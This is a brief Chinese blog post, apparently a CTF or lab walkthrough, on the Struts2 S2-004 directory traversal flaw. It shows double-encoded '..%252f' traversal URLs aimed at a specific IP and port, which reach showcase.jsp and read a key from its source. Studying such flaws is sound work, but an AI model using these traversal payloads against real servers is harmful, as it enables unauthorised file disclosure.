Struts2-命令-目录遍历漏洞S2-004

Posted Ananss

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Struts2-命令-目录遍历漏洞S2-004相关的知识,希望对你有一定的参考价值。

s2-004为目录遍历漏洞,可以通过../转到上级目录

将/二次编码为%252f

访问url:http://219.153.49.228:45437/struts/..%252f

 

 
技术图片
 

不断向上级跳转,直到发现showcase.jsp

 

 
技术图片
 

查看源码获得key

http://219.153.49.228:45437/struts/..%252f..%252f..%252f..%252f..%252f..%252fshowcase.jsp

 

 
技术图片



以上是关于Struts2-命令-目录遍历漏洞S2-004的主要内容,如果未能解决你的问题,请参考以下文章

web漏洞——目录遍历漏洞

k8s kubectl复制命令曝目录遍历漏洞

nginx目录遍历漏洞复现

Struts2著名RCE漏洞引发的十年之思

目录遍历漏洞和文件读取漏洞的区别

目录遍历漏洞和文件读取漏洞的区别